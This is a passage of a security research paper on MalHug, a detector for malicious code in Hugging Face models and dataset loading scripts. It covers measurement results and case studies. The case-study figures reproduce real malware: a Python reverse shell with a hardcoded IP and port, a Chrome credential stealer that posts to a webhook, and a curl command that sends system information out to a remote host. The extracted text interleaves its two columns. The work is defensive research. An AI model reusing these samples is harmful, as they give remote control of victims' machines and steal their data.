24 return ℎ𝑎𝑠_𝑙𝑎𝑚𝑏𝑑𝑎_𝑙𝑎𝑦𝑒𝑟, 𝑢𝑛𝑠𝑎𝑓 𝑒_𝑜𝑝𝑡 ; cannot be effectively marked through API-based methods alone. 687
630 To address this limitation and enhance our detection capabilities, 688
631 previous studies [11, 38]. To perform this analysis, we build Mal- we incorporate heuristic pattern matching as a complementary 689
632 Hug on an open-source static analysis framework Scalpel[37]. We technique to our taint analysis approach, leveraging YARA [80] 690
633 use Scalpel to construct control flow and data flow graphs, which rules for efficient and flexible pattern matching. By applying these 691
634 serve as the foundation for our taint analysis. On top of this foun- YARA-based heuristics, we can detect various sophisticated attack 692
635 dation, we define a comprehensive taint configuration based on a patterns that do not rely solely on API calls, including reverse shell 693
636 categorized set of source and sink APIs. These APIs are typically commands potentially obfuscated within strings or comments, sus- 694
637 drawn from the unsafe APIs listed in Table 3, but we assign them picious network connection attempts defined by string patterns 695
638 6 696
Models Are Codes: Towards Measuring Malicious Code Poisoning Attacks on Pre-trained Model Hubs Conference’17, July 2017, Washington, DC, USA

697 rather than API usage, unusual combinations of system calls or 106
Pickle Variants PyTorch Keras TensorFlow NumPy Others 755
(4.1%) (51.0%) (2.7%) (2.5%) (0.6%) (39.1%)
698 command structures indicative of malicious intent, code injection 251,547 216,266
756
699 techniques that may bypass API-level detection, and indicators of 105
757
42,853
41,393
700 fileless malware or in-memory execution. The flexibility of YARA 25,264
758

Number of models
13,646 18,813
701 rules allows us to define complex pattern-matching logic that can 11,424 12,277 9,712 759
104
702 adapt to evolving threat landscapes and capture taint sources that 3,885 4,732 3,029 760
are not explicitly tied to API calls. The integration of YARA-based 1,201 1,066
103
703 761
704 heuristic pattern matching with our taint analysis enables Mal- 221 208 239
762
705 Hug to achieve a more comprehensive and nuanced approach to 102 763
706 malicious code detection in pre-trained models. This dual-pronged 764
707 strategy significantly enhances our ability to identify both API- 101 10 765
.pk.pl ickle.joblib .dill .pt .pth .bin keras .h5eras) pb(tf).tflite.ckpt .npz .npy nsors.onnx.gguf pack
. k . g
.pb( ete .ms
708 based and pattern-based threats, providing a robust defense against 766
.saf
709 a wide array of potential security risks in AI systems. Format Categories 767
710 768
711 5 EVALUATION Figure 3: File extension usage in Hugging Face. 769
712 Vulnerable Model Format Statistics. Our investigation covers 770
5.1 Experimental Setup
713 705,991 mirrored model repositories, of which 133,058 are empty (con- 771
714 Implementation. We have implemented a prototype of MalHug taining only .gitattributes and README.md). Among non-empty 772
715 and deployed it on the mirrored Hugging Face instance within Ant repositories, we observe a diverse range of model formats, as illus- 773
716 Group for over three months. The model decompilation module trated in Figure 3, with a significant portion potentially vulnerable 774
717 of MalHug is built upon the open-source Fickling [52] and Mod- to security risks. PyTorch models (.pt/.pth/.bin), which fun- 775
718 elScan [63], enabling preliminary filtering of suspicious models. damentally use Pickle for serialization, are most prevalent with 776
719 Furthermore, MalHug implements in-depth taint analysis based 335,893 (51.0%) instances. This, combined with explicit Pickle vari- 777
720 on the Scalpel [37], complemented by custom YARA [80] rules to ants (.pkl, .pickle, .joblib, .dill) accounting for 26,696 (4.1%) 778
721 detect malicious taint flow patterns. models, means that over 55% of the models use Pickle-based serial- 779
722 Environment. The prototype of MalHug runs on a server with ization, raising substantial security concerns. Additional vulnerable 780
723 Ubuntu Linux 22.04, equipped with two AMD EPYC Milan 7713 formats include Keras models (.keras/.h5/.pb, with 17,739 (2.7%) 781
724 CPUs (2.0 GHz, 64 cores, 128 threads each), 512 GB RAM (8 x 64 instances, and TensorFlow models (.pb/.tflite/.ckpt, account- 782
725 GB modules), two NVIDIA A100 GPUs with 80 GB memory each, ing for 16,395 (2.49%) of the total. Newer formats like .onnx (12,277, 783
726 and four 7.68 TB NVMe SSDs (Western Digital SN640), provid- 1.8%) and .gguf (18,813, 2.8%) show significant adoption, while 784
727 ing a total storage capacity of 30.72 TB. The Hugging Face mirror NumPy formats (.npz/.npy) represent 4,095 (0.6%) of the models. 785
728 synchronization service runs on an Alibaba Cloud ECS instance This distribution highlights the critical need for comprehensive se- 786
729 (ecs.c6a.16xlarge), optimized for data-intensive storage opera- curity measures across various serialization methods, particularly 787
730 tions. The server operates on Alibaba Cloud Linux 3 and is equipped given the widespread use of potentially vulnerable formats like 788
731 with 64 vCPUs, 128 GB of RAM, and 8 data disks, each with 32 TB Pickle-based serialization in PyTorch models. Note that each model 789
732 capacity, providing a total storage of 256 TB. repository may contain multiple model formats, explaining why 790
733 Dataset. Due to the current lack of high-quality ground truth the total number of models exceeds the number of repositories. 791
734 datasets of malicious artifact samples, we aim to evaluate the per- Unsafe API Filtering. Our comprehensive analysis revealed the 792
735 formance of MalHug in the real world and conduct a comprehen- distribution of suspicious APIs across models and dataset loading 793
736 sive investigation and measurement of code poisoning attacks in scripts, as shown in Table 5. These unsafe APIs serve as crucial 794
737 the real world. We download and detect accessible artifacts (mod- indicators, suggesting potential malicious behaviors in models or 795
738 els and datasets) on the largest model hosting platform, Hugging dataset loading scripts. Within the models, the Pickle format ex- 796
739 Face. Specifically, we use Hugging Face’s official Python library, hibited the highest concentration of unsafe calls, particularly to 797
740 huggingface-hub [25], to automatically collect metadata of 760,999 __builtin__ methods. While most models demonstrated caution 798
741 models and 176,849 datasets as of July 12. After excluding mod- against high-risk operations like exec or os.system functions, the 799
742 els with restricted access permissions, we conduct a comprehen- getattr function was overwhelmingly used despite Huggingface 800
743 sive analysis of 705,991 models and 176,386 datasets, collectively platform’s clear “unsafe” label. It accounted for 76% of dangerous 801
744 amounting to 179.4 TB of data. API usage (3,960 instances in models and 679 in dataset loading 802
745 scripts), indicating that developers often prioritized programming 803
746 5.2 Industrial Deployment & Measurement convenience over security considerations. In dataset loading scripts, 804
747 Dataset Loading Script Statistics. Among the 176,386 mirrored we identified multiple categories of unsafe APIs, including eval and 805
748 datasets, 6,578 (3.73%) contain loading scripts. These scripts play a execution functions, command execution APIs, network-related 806
749 crucial role in data preprocessing pipelines, potentially introducing functions, and cryptographic operations. The presence of these 807
750 security vulnerabilities and compromising the integrity of AI work- APIs, though sometimes infrequent, pointed to high specificity and 808
751 flows if not properly scrutinized. Subsequently, MalHug focuses potential security risks. Importantly, the identification of these un- 809
752 its main analysis on the code within these 6,578 dataset loading safe APIs is not conclusive evidence of malicious intent, but rather 810
753 scripts to identify and assess potential security risks. a starting point for further investigation. To thoroughly assess the 811
754 7 812
Conference’17, July 2017, Washington, DC, USA Zhao et al.

813 38 871
Number of Malicious Behaviors

814 35 Remote Control 872


Sensitive Information Theft
30
815 873
816 Proof-Of-Concept 874
25 Potential Code Injection
21 21
817 875
Potential Object Hijack
818 20 18 18 876
17 17
15
819 877
13 12 11
10 10 10
820 878
8 8 9
6
821 879
5 5 5 5 4 4 4
822 3 2 3 880
1
823
0 881
3 4 5 6 7 8 9 2 1 2 3 4 5 6 7 8 9 0 1 2 1 2 3 4 5 6
2-0 2-0 2-0 2-0 2-0 2-0 2-0 2-1 3-0 3-0 3-0 3-0 3-0 3-0 3-0 3-0 3-0 3-1 3-1 3-1 4-0 4-0 4-0 4-0 4-0 4-0
824 882
825 202 202 202 202 202 202 202 202 202 202 202 202 202 202 202 202 202 202 202 202 202 202 202 202 202 202 883
826 884
827 Figure 4: Monthly Malicious Behaviors by Type. 885
828 886
829 Table 5: Partial results of main unsafe Libs/APIs filtering. 887
2022Q1
830 2024Q2 3.66% Sensitive 888
Models 23.07% 2022Q2 Potential Object Information
831 5.86% Hijack Theft 889
Format/Type API #Cnt 42.86% 0.73%
832 2024Q1 2022Q3 890
__builtin__.exec 27 17.94% 3.30% Remote
833 Control 891
2022Q4
__builtin__.compile 1 Potential Code 5.13%
834 0.73% 892
2023Q4 2023Q1 Injection
__builtin__.eval 23 Proof-Of-Concept
835 12.08% 9.52% 26.01% 893
25.27%
836
Pickle __builtin__.getattr 3,775 2023Q3 894
14.69% 2023Q2
837
runpy._run_code 6 9.16% 895
838
os.system/posix.system 18 896
webbrowser.open 3
839 (a) Quarterly Distribution. (b) Types Distribution. 897
840
Keras Lambda 72 898
TensorFlow ReadFile/WriteFile/etc. 35 Figure 5: Distribution of malicious behaviors.
841 899
842
Dataset Loading Scripts 900
843 YAML yaml.load 1 from these identified malicious artifacts, categorized through static 901
844 __builtin__.compile 56 analysis techniques and meticulous manual reviews by experienced 902
845 __builtin__.eval 74 researchers. The classification prominently includes remote control, 903
846 Eval and Execution __builtin__.getattr 456 sensitive information theft, proof-of-concept, potential code injec- 904
847 __builtin__.__import__ 3 tion, and potential object hijack. For potential object hijacking, we 905
848 __builtin__.exec 2 employ AST traversal to examine objects and properties accessed 906
849 os.system 12 by the getattr function. Instances where the object is a variable or 907
Command Execution
850 subprocess.* 13 the property relates to code injection are flagged as potential risks. 908
851 urllib.request.* 32 The use of the Lambda layer, due to its difficulty in marshal dese- 909
852 Network urllib.parse.* 15 rialization and relatively infrequent use, will be directly marked 910
853 aiohttp.client.get 1 as a potential code injection. In distinguishing between proof-of- 911
854 base64.b64encode 5 concept and actual malicious behaviors, we rely on detailed manual 912
855 Cryptography base64.urlsafe_b64encode 1 reviews. This process reveals that some codes initially flagged as 913
856 base64.b64decode 8 malicious are, in fact, proof-of-concept experiments by researchers, 914
857 Total / 4,639 posing no direct harm. 915
858 actual threat posed by these suspicious API calls, we conducted Our analysis reveals a fluctuating but generally increasing trend 916
859 in-depth taint analysis on the flagged instances. This detailed ex- in malicious behaviors over the observed period. As shown in Fig- 917
860 amination allowed us to analyze the malicious behavior patterns, ure 5a, the proportion of detected malicious artifacts varies across 918
861 if any, and distinguish between genuine security threats, neces- quarters. We observe a significant increase in the latter half of 919
862 sary research-related usage (such as in security proof-of-concept the study period, with Q1 2024 and Q2 2024 showing the highest 920
863 experiments), and potential false positives. percentages of malicious artifacts. This trend suggests an escalat- 921
864 Malicious Behaviors Identified. So far, based on a three-month ing sophistication or frequency of malicious activities in recent 922
865 continuous detection on the Ant Group mirrored Hugging Face in- months. Regarding the distribution of malicious behavior types, 923
866 stance, MalHug has identified 264 malicious models and 9 malicious Figure 5b illustrates that potential object hijack constitutes the 924
867 dataset loading scripts. The publication dates of these malicious ar- largest category, accounting for 42.86% of all identified malicious 925
868 tifacts range from March 2022 to June 2024. Figure 4 presents a clas- behaviors. This is followed by potential code injection (26.01%), 926
869 sification of malicious behaviors based on code snippets extracted proof-of-concept (25.27%), remote control (5.13%), and sensitive 927
870 8 928
Models Are Codes: Towards Measuring Malicious Code Poisoning Attacks on Pre-trained Model Hubs Conference’17, July 2017, Washington, DC, USA

929
Table 6: Qualitative comparison with other SOTA techniques. 987
930 988
Tools Developer Granularity Dataset Support? Model Format Support?
931 989
932 Pickle Scanning [16] HuggingFace Unsafe Lib & API ✗ Pickle Only 990
933 PickleScan [46] mmaitre314 Unsafe Lib & API ✗ Pickle Only 991
934 Fickling [52] Trail of Bits Unsafe Lib & API ✗ Pickle Only 992
935
Bhakti [10] Dropbox Inc Unsafe Lib & API ✗ Tensorflow & Keras 993
936 994
ModelScan [63] ProtectAI Unsafe Lib & API ✗ Pickle Variants; Tensorflow & Keras
937 995
MalHug / Semantic Level ✓ Pickle Variants; Tensorflow & Keras
938 996
939 997
information theft (0.73%). The prevalence of proof-of-concept in- 1 RHOST="192.248.1.167";RPORT=4242;
940 998
2 from sys import platform
941 dicates active security research within the community, while the 3 if platform != 'win32': 999
4 import threading
942 significant proportion of potential code injection and remote con- 5 def a(): 1000
6 import socket, pty, os
943 trol highlights the pressing need for enhanced security measures. 7 RHOST="192.248.1.167";RPORT=4242 1001
8 s=socket.socket();
944 s.connect((RHOST,RPORT)); 1002
[os.dup2(s.fileno(),fd) for fd in (0,1,2)];
945 5.3 Comparison with SOTA Techniques pty.spawn("/bin/sh")
1003
946 9 threading.Thread(target=a).start() 1004
To contextualize the capabilities of MalHug, we conduct a qualita- 10 else:
947 11 import os, socket, subprocess, threading, sys 1005
tive comparison (see Table 6) with other SOTA techniques in PTM 12 def s2p(s, p):
948 13 while True:p.stdin.write(s.recv(1024).decode()); p.stdin.flush() 1006
code poisoning detection. Existing tools like Pickle Scanning[16], 14 def p2s(s, p):
949 15 while True: s.send(p.stdout.read(1).encode())
1007
PickleScan[46], and Fickling [52] primarily focus on detecting 16 s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
950 1008
unsafe libraries and API calls in pickle files. Bhakti[10] and Mod- 17 while True:
951 18 try: s.connect(("192.248.1.167", 4242)); break 1009
elScan [63] extend to unsafe Lambda layer detection of TensorFlow 19 except: pass
952 20 p=subprocess.Popen(["powershell.exe"], stdout=subprocess.PIPE, 1010
and Keras models, but still concentrate on library and API-level stderr=subprocess.STDOUT, stdin=subprocess.PIPE, shell=True, text=True)
953 21 threading.Thread(target=s2p, args=[s,p], daemon=True).start() 1011
analysis and fail to analyze dataset loading scripts. In contrast, 22 threading.Thread(target=p2s, args=[s,p], daemon=True).start()
954 1012
MalHug offers several distinctive features that set it apart from 23 p.wait()
955 1013
existing solutions. Unlike other tools that focus solely on unsafe
956 Figure 6: Code snippet injected into “star23/baller10”, 1014
libraries and API calls, MalHug performs analysis at the semantic
957 which establishes a reverse shell, enabling remote control. 1015
level, allowing for a more nuanced and comprehensive detection of
958 1016
potential security threats. Moreover, MalHug is the only tool in
959 1017
our comparison that extends its analysis to dataset loading scripts, 1 def main():
960
addressing a critical gap in the current security landscape of model 2 Functions.Initialize() 1018
961
hub ecosystems. Similar to ModelScan, MalHug supports various 3 passwordData = StealerFunctions.stealPass() 1019
962 4 cookieData = StealerFunctions.stealCookies() 1020
pickle variants as well as TensorFlow and Keras formats, enabling 5 StealerFunctions.sendToWebhook(f"Password Data:
963 1021
comprehensive security analysis across different model types. \n{passwordData}\n\nCookie Data:\n{cookieData}")
964
6 zip_file(Paths.stealerLog, os.path.join( 1022
965 Paths.stealerLog, 'LOG.zip'), 'henanigans') 1023
966 5.4 Case Studies 1024
967 Case#1: Remote Control. As shown in Figure 6, malicious code Figure 7: Dataset loading script in “Besthpz/best”, which 1025
968 exists in a PyTorch model repository named “baller10”, which steals Chrome credentials and sends them to a remote server. 1026
969 establishes a reverse shell when the model is loaded, executing 1027
970 commands based on the operating system (Windows or UNIX-like). Case#2: Chrome Credential Stealer. This case examines a so- 1028
971 The malicious payload resembles those found in the previously phisticated malware discovered in the “Besthpz/best” repository, 1029
972 identified “baller423/goober2” repository by JFrog [9], revealing designed to steal credentials from Google Chrome browsers. The 1030
973 a pattern of malicious code reuse and adaptation. Despite the subse- malware’s main function (see Figure 7) executes a series of op- 1031
974 quent deletion of the “baller423” account, the similarity in model erations to extract and exfiltrate sensitive user data. Initially, it 1032
975 name (“baller10”) suggests a possible connection. Notably, for the calls Functions.Initialize (Line2) to prepare the environment, 1033
976 10 malicious models created by “star23”, our analysis unveils a terminating any running Chrome processes and setting up neces- 1034
977 broader attack strategy: these models’ reverse shell commands point sary directories. The malware then proceeds to steal passwords 1035
978 to different geographical locations, including Sri Lanka, Germany, and cookies using StealerFunctions.stealPass (Line 3) and 1036
979 and Poland, indicating that the attackers might use proxy servers StealerFunctions.stealCookies (Line 4) respectively. These func- 1037
980 to hide their real location. Despite being labeled “for research use” tions decrypt and extract login credentials and cookie data from 1038
981 with warnings against downloading, these models successfully con- Chrome’s local storage. The stolen information is then sent to a 1039
982 nect to external servers, posing significant security risks. This case remote server using StealerFunctions.sendToWebhook (Line 5), 1040
983 highlights the real-world consequences of such attacks on unsus- potentially compromising user privacy and security. Finally, the 1041
984 pecting users and emphasizes the importance of robust security malware creates a password-protected ZIP file containing the stolen 1042
985 protocols in PTM reuse workflows. data (Line 6), further obfuscating its activities. 1043
986 9 1044
Conference’17, July 2017, Washington, DC, USA Zhao et al.

1045 1 import datasets malicious exploits in the wild. Thirdly, although we have not en- 1103
2 import subprocess
1046 3 countered examples of obfuscation techniques used to evade static 1104
1047 4 ... analysis in models, the possibility of such anti-analysis methods 1105
5 class StanSmall(datasets.GeneratorBasedBuilder):
1048 6 cannot be dismissed, drawing parallels from research on package 1106
7 def __init__(self, **kwargs):
1049
8 subprocess.check_output( manager poisoning [11, 38]. Finally, we identify potentially mali- 1107
1050 9 '(uname -a; ps auxww) | curl -s https:// cious TensorFlow and Keras models by flagging those using lambda 1108
eoxvp5idbpacu69.m.pipedream.net/$(whoami) --data-binary @-',
1051 10 stderr=subprocess.STDOUT, functions and unsafe operators, which may result in false positives. 1109
1052 11 shell=True) These limitations underscore the need for continuous refinement of 1110
12 super(StanSmall, self).__init__(**kwargs)
1053 13 ... detection methodologies and highlight the challenges in securing 1111
1054 pre-trained model hubs against evolving threats. 1112
1055 Figure 8: Dataset loading script in “Yash2998db/stan_small”, 1113
1056 which leaks sensitive system information. 7 RELATED WORK 1114
1057 Malicious Code Poisoning Attacks. Code poisoning attacks have 1115
1058
Case#3: Operating System Reconnaissance. This case study 1116
examines a potentially malicious loading script discovered in the been a persistent threat in software supply chains. Recent studies
1059 have explored these attacks in various contexts, including package 1117
1060
“Yash2998db/stan_small” dataset repository. The script, designed 1118
as a custom dataset builder for the Hugging Face datasets library, managers [11, 23, 36, 54] and pre-trained model pipelines [22, 39,
1061 84]. Ladisa et al. [36] proposed a comprehensive taxonomy of at- 1119
1062
contains suspicious code within its initialization method. Specif- 1120
ically, in the __init__ method of the StanSmall class, the script tacks on open-source supply chains, covering 107 unique vectors
1063 linked to 94 real-world incidents. In the PTM domain, Hua et al. [22] 1121
1064
executes a subprocess that collects and exfiltrates sensitive system 1122
information. The malicious code uses subprocess.check_output demonstrated how malicious payloads could be hidden in mobile
1065 deep learning models using black-box backdoor attacks. Building 1123
1066
to run shell commands that gather system details (uname -a) and in- 1124
formation about running processes (ps auxww). The collected data is upon these studies, our work extends the current understanding
1067 by conducting the first systematic investigation of malicious code 1125
1068
then sent to a remote server (eoxvp5idbpacu69.m.pipedream.net) 1126
via a curl command, with the current user’s identity appended to poisoning attacks specifically targeting pre-trained model hubs.
1069 Security of Model Hubs. As model hubs have gained prominence, 1127
1070
the URL ($(whoami)). 1128
their security has become a growing concern. Zhou [85] examined
1071 insecure deserialization in pre-trained large model hubs, revealing 1129
1072 6 DISCUSSION risks in unsafe pickle.loads operations. Walker and Wood [81] 1130
1073 Mitigation. Mitigating code poisoning attacks on model hubs re- analyzed machine learning supply chain attacks, highlighting the 1131
1074 quires a comprehensive approach combining platform-level secu- danger of maliciously crafted model files. Jiang et al. [31] studied 1132
1075 rity and developer vigilance. While Hugging Face has implemented artifacts and security features across multiple model hubs, exposing 1133
1076 pickle import scanning, this measure alone is insufficient due to insufficient defenses for pre-trained models (PTMs). In a separate 1134
1077 its inability to perform deep semantic analysis of potentially mali- study, Jiang et al. [29] investigated PTM naming practices on Hug- 1135
1078 cious code. As for malicious dataset loading scripts, Hugging Face ging Face, introducing DARA for detecting naming anomalies. Our 1136
1079 plans to disable the automatic execution of dataset loading scripts work extends beyond these studies by providing the first systematic 1137
1080 by default in their next major release, requiring users to explicitly investigation of malicious code injection attacks specifically target- 1138
1081 set “trust_remote_code=True” for script-dependent datasets [24]. ing pre-trained model hubs. We not only analyze vulnerabilities 1139
1082 Additionally, Keras has addressed vulnerabilities related to Lambda and attack vectors but also implement a detection pipeline deployed 1140
1083 layers in version 2.13 [6], enhancing the security of models using in a real-world industrial setting. 1141
1084 this feature. Despite these improvements, developers must remain 1142
1085 vigilant, adopting safer practices such as using secure model formats 8 CONCLUSION 1143
1086 and treating unknown pre-trained models with caution, adhering This paper presents the first systematic study of malicious code poi-
1144
1087 to the principle that “Models Are Codes”. soning attacks on pre-trained model hubs, focusing on the Hugging
1145
1088 Generalizability and Scalability. While our study primarily fo- Face. We developed MalHug, an end-to-end pipeline that addresses
1146
1089 cuses on the Hugging Face platform, the insights gained and method- the limitations of existing tools through comprehensive analysis
1147
1090 ologies developed are broadly applicable to other model hubs. The techniques. The deployment within Ant Group demonstrated its
1148
1091 identified code poisoning attack vectors and proposed mitigation effectiveness in real-world industrial settings, uncovering 264 mali-
1149
1092 strategies are relevant across various platforms and frameworks. cious models and 9 malicious dataset loading scripts among over
1150
1093 Our approach demonstrates the potential for large-scale analysis 705K models and 176K datasets. These findings reveal significant
1151
1094 of models and datasets. security threats, including reverse shell attacks, credential theft,
1152
1095 Limitations While our study provides valuable insights into code and system reconnaissance. Our work advances our understanding
1153
1096 poisoning attacks on model hubs, several limitations warrant con- of vulnerabilities in the PTM supply chain and provides a practical
1154
1097 sideration. Firstly, due to access permission restrictions, our analysis solution for enhancing model hub security.
1155
1098 could not encompass all models and datasets on the platform, po- 1156
1099 tentially leading to undetected malicious instances. Secondly, the 1157
1100 collection of unsafe libraries and APIs, though informed by exist- 1158
1101 ing work like Pysa [17], may not exhaustively cover all potential 1159
1102 10 1160
Models Are Codes: Towards Measuring Malicious Code Poisoning Attacks on Pre-trained Model Hubs Conference’17, July 2017, Washington, DC, USA

1161 REFERENCES [27] Hugging Face. 2024. Hugging Face: The AI community building the future. 1219
1162 [1] Alien, and Nicky. 2023. Beware of Hugging Face open-source component risks https://huggingface.co/. Accessed: 2024-07-12. 1220
exploited in large language model supply chain attacks. https://security.tencent. [28] Hugging Face. 2024. safetensors. https://huggingface.co/docs/safetensors/index.
1163 Accessed: 2024-07-07. 1221
com/index.php/blog/msg/209. Accessed: 2024-07-05.
1164 [2] Amr Elmeleegy, Shivam Raj, Brian Slechta, and Vishal, Mehta. 2024. Demysti- [29] Wenxin Jiang, Chingwo Cheung, George K Thiruvathukal, and James C Davis. 1222
1165 fying AI Inference Deployments for Trillion Parameter Large Language Mod- 2023. Exploring naming conventions (and defects) of pre-trained deep learning 1223
els. https://developer.nvidia.com/blog/demystifying-ai-inference-deployments- models in hugging face and other model hubs. arXiv preprint arXiv:2310.01642
1166 (2023). 1224
for-trillion-parameter-large-language-models/. Accessed: 2024-07-05.
1167 [3] Bar Lanyado. 2023. More than 1500 HuggingFace API Tokens were ex- [30] Wenxin Jiang, Nicholas Synovic, Matt Hyatt, Taylor R. Schorlemmer, Rohan 1225
posed, leaving millions of Meta-Llama, Bloom, and Pythia users vulnerable. Sethi, Yung-Hsiang Lu, George K. Thiruvathukal, and James C. Davis. 2023. An
1168 1226
https://www.lasso.security/blog/1500-huggingface-api-tokens-were-exposed- Empirical Study of Pre-Trained Model Reuse in the Hugging Face Deep Learning
1169
leaving-millions-of-meta-llama-bloom-and-pythia-users-for-supply-chain- Model Registry. In Proceedings of the 45th International Conference on Software 1227
1170 attacks. Accessed: 2024-07-05. Engineering (Melbourne, Victoria, Australia) (ICSE ’23). IEEE Press, 2463–2475. 1228
[4] Boyan Milanov. 2024. Exploiting ML models with pickle file attacks: Part https://doi.org/10.1109/ICSE48619.2023.00206
1171 [31] Wenxin Jiang, Nicholas Synovic, Rohan Sethi, Aryan Indarapu, Matt Hyatt, 1229
2. https://blog.trailofbits.com/2024/06/11/exploiting-ml-models-with-pickle-
1172 file-attacks-part-2/. Accessed: 2024-07-05. Taylor R. Schorlemmer, George K. Thiruvathukal, and James C. Davis. 2022. 1230
1173 [5] Boyan Milanov. 2024. Exploiting ML models with pickle file attacks: Part An Empirical Study of Artifacts and Security Risks in the Pre-trained Model 1231
2. https://blog.trailofbits.com/2024/06/11/exploiting-ml-models-with-pickle- Supply Chain. In Proceedings of the 2022 ACM Workshop on Software Supply Chain
1174
file-attacks-part-1/. Accessed: 2024-07-05. Offensive Research and Ecosystem Defenses (Los Angeles, CA, USA) (SCORED’22). 1232
1175 [6] CERT Vulnerability Notes Database. 2024. Keras 2 Lambda layers allow arbi- Association for Computing Machinery, New York, NY, USA, 105–114. https: 1233
trary code injection in TensorFlow models. https://kb.cert.org/vuls/id/253266. //doi.org/10.1145/3560835.3564547
1176 1234
Accessed: 2024-07-13. [32] Wenxin Jiang, Jerin Yasmin, Jason Jones, Nicholas Synovic, Jiashen Kuo,
1177 Nathaniel Bielanski, Yuan Tian, George K. Thiruvathukal, and James C. Davis. 1235
[7] Cisco-Talos. 2024. ClamAV. https://github.com/Cisco-Talos/clamav. Accessed:
1178 2024-07-05. 2024. PeaTMOSS: A Dataset and Initial Analysis of Pre-Trained Models in Open- 1236
[8] Cloudpickle Developers. 2024. Cloudpickle: Extended pickling support for Python Source Software. In Proceedings of the 21st International Conference on Mining
1179 Software Repositories (Lisbon, Portugal) (MSR ’24). Association for Computing Ma- 1237
objects. https://github.com/cloudpipe/cloudpickle. Accessed: 2024-07-07.
1180 [9] David Cohen. 2024. Data scientists targeted by malicious Hugging Face ML chinery, New York, NY, USA, 431–443. https://doi.org/10.1145/3643991.3644907 1238
1181 models with silent backdoor. https://jfrog.com/blog/data-scientists-targeted-by- [33] Joblib. 2024. Joblib: running Python functions as pipeline jobs. https://joblib. 1239
malicious-hugging-face-ml-models-with-silent-backdoor/. Accessed: 2024-07- readthedocs.io/en/stable/generated/joblib.load.html. Accessed: 2024-07-07.
1182 [34] John Snow Labs. 2024. Spark NLP Models Hub. https://nlp.johnsnowlabs.com/ 1240
05.
1183 [10] Dropbox. 2024. Bhakti. https://github.com/dropbox/bhakti. Accessed: 2024-07- models. Accessed: 2024-07-06. 1241
12. [35] Kaggle. 2024. Kaggle Models. https://www.kaggle.com/models. Accessed:
1184 1242
[11] Ruian Duan, Omar Alrawi, Ranjita Pai Kasturi, Ryan Elder, Brendan Saltaformag- 2024-07-06.
1185 [36] P. Ladisa, H. Plate, M. Martinez, and O. Barais. 2023. SoK: Taxonomy of Attacks 1243
gio, and Wenke Lee. 2021. Towards Measuring Supply Chain Attacks on Package
1186 Managers for Interpreted Languages. In 28th Annual Network and Distributed on Open-Source Software Supply Chains. In 2023 IEEE Symposium on Security 1244
System Security Symposium, NDSS. https://www.ndss-symposium.org/wp- and Privacy (SP). IEEE Computer Society, Los Alamitos, CA, USA, 1509–1526.
1187 https://doi.org/10.1109/SP46215.2023.10179304 1245
content/uploads/ndss2021_1B-1_23055_paper.pdf
1188 [12] Eoin Wickens, and Kasimir Schulz. 2024. Hijacking safeTensors conversion on [37] Li Li, Jiawei Wang, and Haowei Quan. 2022. Scalpel: The Python Static Analysis 1246
1189 Hugging Face. https://hiddenlayer.com/research/silent-sabotage/. Accessed: Framework. arXiv preprint arXiv:2202.11840 (2022). 1247
2024-07-05. [38] Ningke Li, Shenao Wang, Mingxi Feng, Kailong Wang, Meizhen Wang, and
1190 Haoyu Wang. 2023. MalWuKong: Towards Fast, Accurate, and Multilingual 1248
[13] Eoin Wickens, Marta Janus, and Tom Bonner. 2022. Pickle files: The new ML
1191 model attack vector. https://hiddenlayer.com/research/pickle-strike/. Accessed: Detection of Malicious Code Poisoning in OSS Supply Chains. In 2023 38th 1249
2024-07-05. IEEE/ACM International Conference on Automated Software Engineering (ASE).
1192 1250
[14] Eoin Wickens, Marta Janus and Tom Bonner. 2022. Weaponizing ML models with 1993–2005. https://doi.org/10.1109/ASE56229.2023.00073
1193 [39] Yuanchun Li, Jiayi Hua, Haoyu Wang, Chunyang Chen, and Yunxin Liu. 2021. 1251
ransomware. https://hiddenlayer.com/research/weaponizing-machine-learning-
1194 models-with-ransomware/. Accessed: 2024-07-05. Deeppayload: Black-box backdoor attack on deep learning models through neural 1252
[15] Hugging Face. 2024. Load a dataset from the hub. https://huggingface.co/docs/ payload injection. In 2021 IEEE/ACM 43rd International Conference on Software
1195 Engineering (ICSE). IEEE, 263–274. 1253
datasets/load_hub. Accessed: 2024-07-07.
1196 [16] Hugging Face. 2024. Pickle scanning. https://huggingface.co/docs/hub/security- [40] Xiangru Lian, Binhang Yuan, Xuefeng Zhu, Yulong Wang, Yongjun He, Honghuan 1254
1197 pickle. Accessed: 2024-07-05. Wu, Lei Sun, Haodong Lyu, Chengjun Liu, Xing Dong, Yiqiao Liao, Mingnan 1255
[17] Facebook. 2024. Pysa Taint Rules. https://github.com/facebook/pyre-check/tree/ Luo, Congfei Zhang, Jingru Xie, Haonan Li, Lei Chen, Renjie Huang, Jianying
1198 Lin, Chengchun Shu, Xuezhong Qiu, Zhishan Liu, Dongying Kong, Lei Yuan, 1256
main/stubs/taint/core_privacy_security. Accessed: 2024-07-13.
1199 [18] William Fedus, Barret Zoph, and Noam Shazeer. 2022. Switch Transformers: Hai Yu, Sen Yang, Ce Zhang, and Ji Liu. 2022. Persia: An Open, Hybrid System 1257
Scaling to Trillion Parameter Models with Simple and Efficient Sparsity. Journal Scaling Deep Learning-based Recommenders up to 100 Trillion Parameters. In
1200 1258
of Machine Learning Research 23, 120 (2022), 1–39. http://jmlr.org/papers/v23/21- Proceedings of the 28th ACM SIGKDD Conference on Knowledge Discovery and Data
1201
0998.html Mining (Washington DC, USA) (KDD ’22). Association for Computing Machinery, 1259
